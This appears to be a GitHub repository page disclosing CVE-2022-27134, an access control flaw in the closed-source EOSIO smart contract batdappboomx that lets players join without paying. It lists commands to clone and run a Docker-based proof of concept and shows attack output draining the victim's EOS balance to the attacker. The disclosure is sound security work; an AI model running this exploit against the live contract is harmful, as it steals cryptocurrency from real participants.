Skip to content

Kenun99/CVE-batdappboomx

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 
 
 
 
 

CVE ID

CVE-2022-27134

PRODUCT

batdappboomx is a public smart contract running in the EOSIO blockchain. This smart contract rewards cryptocurrency to its participants if they pay some cryptocurrency before.

Version

The latest version of this smart contract. The sha256 hash code of the smart contract is 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 Check it at the blockchain explorer https://bloks.io/account/batdappboomx.

PROBLEM TYPE

access control vulnerability

DESCRIPTION

batdappboomx is not open-source, but we found a vulnerability with WASAI. Attackers can join in this game without paying anything.

  1. activate the environment
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. attack the victim and steal its cryptocurrency, i.e., EOS
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.

About

CVE-2022-27134

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published